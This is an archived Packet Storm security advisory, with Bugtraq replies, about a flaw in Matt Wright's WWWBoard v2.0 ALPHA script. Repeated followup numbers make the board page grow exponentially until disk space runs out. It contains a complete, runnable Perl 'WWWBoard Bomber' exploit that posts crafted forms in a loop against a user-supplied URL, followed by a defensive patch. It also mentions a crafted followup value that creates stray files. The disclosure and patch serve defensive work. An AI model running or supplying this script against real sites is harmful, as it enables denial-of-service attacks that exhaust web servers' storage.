wwwboard-bomb.txt

1999-08-17T00:00:00
ID PACKETSTORM:15358
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `  
WWWBoard v2.0 ALPHA Vulnerability  
  
Recently, many vulnerabilities have been found in the popular WWWBoard script written by Matt   
Wright, this is yet another. When the followup value in a form posted to the WWWBoard script   
contains the same post number twice, the script follows up to that post twice, even printing the   
number of followups to a particular post (on the wwwboard.html file) multiple times. This exploit   
does even one better than just 'messing up' the board, if done severly enough, it can cause the   
wwwboard.html file to become hundreds of megabytes in size. It appears that the number of   
followups shown on the main page (if there's three, it'd look like "(3)") increases exponentially   
with this flaw, such that posting a followup value of say "5,5,5" 2 times would make (2) appear   
as the followup value, but it would appear 9 times. From the best I can tell, the number of   
followups you have that are the same (like "3,3,3,3,3" would have 5) is the number of times the   
followup value will appear on the wwwboard.html page, and if you post the same twice, it does   
that number to the second power, and thrice does to the third power, etc. (whereas if you post   
"3,3,3,3,3" once, it'll have 5 followup numbers, if you post it twice, it'll have 25, if you post   
it three times, it'll have 125, post it ten times and it'll show 9,765,625 times, twelve times   
244,140,625, thirteen times 1,220,703,125, etc.) And even though it appears that only three bytes   
"(X)" are added for each followup value you see, there are comments in the HTML making it appear   
as "(<!--responses: 3-->5)" in the html source if there's 5 followups to message 3.  
  
As that shows, this can cause much more damage than just a simple annoyance. This flaw could   
easilly be exploited to the point where a users quota is maxed out, or even to the point where   
the web server runs out of disk space. Below is an exploit script, and a patch to fix the   
wwwboard.pl script.  
Samuel Sparling  
  
  
Here is an example perl script to exploit this flaw:  
  
#!/usr/bin/perl  
###################################################  
#  
# WWWBoard Bomber Exploit Script  
# Written By: Samuel Sparling (sparling@slip.net)  
#  
# Written to exploit a flaw in the WWWBoard script  
# by Matt Wright.  
#  
# Copyright © 1998 Samuel Sparling  
# All Rights Reserved.  
#  
# Written 11-04-1998  
###################################################  
use Socket;# Tell perl to use the socket module  
  
# Change this if the server you're trying on uses a different port for http  
$port=80;  
  
print "WWWBoard Bomber Exploit Script\n\n";  
print "WWWBoard.pl URL: ";  
$url=<STDIN>;  
chop($url) if $url =~ /\n$/;  
  
print "Name: ";  
$name=<STDIN>;  
chop($name) if $name =~ /\n$/;  
  
print "E-Mail: ";  
$email=<STDIN>;  
chop($email) if $email =~ /\n$/;  
  
print "Subject: ";  
$subject=<STDIN>;  
chop($subject) if $subject =~ /\n$/;  
  
print "Message: ";  
$message=<STDIN>;  
chop($message) if $message =~ /\n$/;  
  
print "Followup Value: ";  
$followup=<STDIN>;  
chop($followup) if $followup =~ /\n$/;  
  
print "Times to Post: ";  
$stop=<STDIN>;  
chop($stop) if $stop =~ /\n$/;  
  
  
  
# Chop the URL into peices to use for the actual posting  
$remote = $url;  
$remote =~ s/http\:\/\///g;  
$remote =~ s/\/([^>]|\n)*//g;  
  
$path = $url;  
$path =~ s/http\:\/\///g;  
$path =~ s/$remote//g;  
  
  
$forminfo = "name=$name&email=$email&followup=$followup&subject=$subject&body=$message";  
$forminfo =~ s/\,/\%2C/g;# Turn comas into %2C so that they can be posted.  
$forminfo =~ tr/ /+/;  
  
$length = length($forminfo);  
  
$submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser Agent: Mozilla/4.01 (Win95; I)\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: $length\r\n\r\n$forminfo\r\n";  
  
$i=0;  
while($i < $stop)  
{  
&post_message;  
$i++;  
print "$i message(s) posted.\n";  
}  
  
  
sub post_message  
{  
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }  
die("No port specified.") unless $port;  
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");  
$paddr = sockaddr_in($port, $iaddr);  
$proto = getprotobyname('tcp');  
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");  
connect(SOCK, $paddr) || die("Unable to connect: $!");  
send(SOCK,$submit,0);  
while(<SOCK>) {  
#print $_;# Uncomment for debugging if you have problems.  
}  
close(SOCK);  
}  
  
  
exit;  
  
  
  
Below is the patch, all it does is check to make sure that the same followup number is not used more than once in the followups form field.  
  
In the get_variables subroutine replace this:  
  
if ($FORM{'followup'}) {  
$followup = "1";  
@followup_num = split(/,/,$FORM{'followup'});  
$num_followups = @followups = @followup_num;  
$last_message = pop(@followups);  
$origdate = "$FORM{'origdate'}";  
$origname = "$FORM{'origname'}";  
$origsubject = "$FORM{'origsubject'}";  
}  
  
with this:  
  
if ($FORM{'followup'}) {  
$followup = "1";  
@followup_num = split(/,/,$FORM{'followup'});  
$num_followups = @followups = @followup_num;  
$last_message = pop(@followups);  
$origdate = "$FORM{'origdate'}";  
$origname = "$FORM{'origname'}";  
$origsubject = "$FORM{'origsubject'}";  
  
# WWWBoard Bomb Patch   
# Written By: Samuel Sparling (sparling@slip.net)  
$fn=0;  
while($fn < $num_followups)  
{  
$cur_fup = @followups[$fn];  
$dfn=0;  
foreach $fm(@followups)  
{  
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)  
{  
&error(board_bomb);  
}  
$dfn++;  
}  
$fn++;  
}  
# End WWWBoard Bomb Patch  
}  
  
  
--------------------------------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 14:11:39 +0300  
From: Spartak Radchenko <spartak@AIF.RU>  
To: BUGTRAQ@netspace.org  
Subject: Re: WWWBoard Vulnerability  
  
I advise you not to use any of Matt Wright programs. According to my  
experience they are full of various bugs (at least, the program that I  
tried to use).  
  
I tried to use his Web counter (TextCounter C++ Version 1.3) and it was  
full of absolutely lame errors. His attemts to invent a new way of  
file locking was simply ridiculous. After several attempts to correct  
these errors I came to conclusion that its design is invalid beyond repair  
and simply rewrote it from the scratch.  
  
An example from  
http://www.worldwidemart.com/scripts/cgi-bin/c_download.cgi?s=textcounter&c=txt&f=tcounter.cpp:  
  
// Generate the lock filename.  
lock_file = new char[count_page_len + 4];  
strcat(lock_file,data_dir);  
strcat(lock_file,count_page);  
strcat(lock_file,".lck");  
  
No comments...  
  
My email to Matt Wright about these bugs was ignored.  
  
Spartak Radchenko SVR1-RIPE  
Arguments & Facts Weekly  
  
On Mon, 9 Nov 1998, Samuel Sparling wrote:  
  
> Recently, many vulnerabilities have been found in the popular "WWWBoard  
> v2.0 ALPHA" script written by Matt Wright, this is yet another. When the  
  
  
--------------------------------------------------------------------------------------  
  
Date: Tue, 10 Nov 1998 22:56:08 -0800  
From: Samuel Sparling <sparling@SLIP.NET>  
To: BUGTRAQ@netspace.org  
Subject: Re: WWWBoard Vulnerability  
  
I'd like to mention that the patch I gave a few days ago (in the "WWWBoard  
Vulnerability" posting), also protects against other bogus followup errors  
(whereas, w/o the patch, somebody using the exploit script, or just a form,  
could post w/ an followup value of for instance "44,blah", and the script  
would create a file called blah.html.) Although the file created when doing  
that is empty, it will not show up in the "WWWAdmin" script, other than  
that, there isn't any problem I've yet found with that.  
Samuel Sparling  
  
`